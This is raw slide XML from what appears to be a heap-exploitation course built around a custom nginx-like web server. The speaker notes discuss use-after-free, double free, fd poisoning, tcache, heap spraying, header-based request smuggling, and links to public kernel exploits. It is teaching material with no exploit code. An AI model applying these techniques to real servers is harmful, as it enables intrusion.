        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1986959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 Questions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="582725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 this for all variables necessary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3200569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Say This is ALSO in the headers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Interpret header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Anything where the functionality EXPLICITLY removes headers? Cough cough… connection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="666483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Modify the request according to the header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1437326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Goal of the connection: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make a persistent connection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Drop headers for each hop		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1085850" lvl="2" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This feature led to a specification defined HTTP smuggling attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41134711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 after free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83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3546684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Attempts to read ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>custom_callback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ value from ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>req_header_lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[index]’.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Leads to the out of bounds read</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1295206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Segfault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from ‘name’ being blank (0) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="347327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My own server. Similar to nginx.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39022404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Both viable options:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fd poison with double free #3 would amazing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used double free #3 for a leak by freeing the response body string. Neat!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Living off the land</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="937490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Story of people living off berries, trees and things. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using your surroundings to exploit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91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2743905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At the end of the day, you have a bug in ONE spot. But, you have a near infinite amount of objects around to attack.</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What makes a good target object to exploit?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What if we had a buffer overflow vulnerability – for the struct</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2871308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Linux networking stack as a timer. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	- https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xz.aliyun.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/t/3455</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Callback &amp; data are useful</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38893994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After the ‘spray’ object, talk about WHAT makes an ideal object for this. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LakshmiDesai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/CVE-2016-8655</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>94</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8225149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xairy.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/articles/2017/cve-2017-6074</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xairy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/kernel-exploits/tree/master/CVE-2017-6074</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2536681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Used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to corrupt Player struct in our exercise for UAF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Could </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16366892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AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2758833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Used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to corrupt Player struct in our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>exercise for UAF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Could </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25682743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Look at objects as a means to an exploitation end now. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brings you to the next level of exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317543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the VM…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gotchas: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Carriage return + newline between </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ilnes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two of them between the headers and the body</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40091344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Much of it is contextual though – can we even USE some object at this point in the code? </a:t>
            </a:r>
          </a:p>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101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22979480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102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35800105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103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22938838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104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32947756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105</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35708590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Similar to UAF exercise! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>STOP – questions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AC55928C-CD14-454C-B617-1AFCF9A58596}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>106</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30208686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107</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29993029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Freed chunk goes into the 0x30 TCache bin </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use after free on the header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
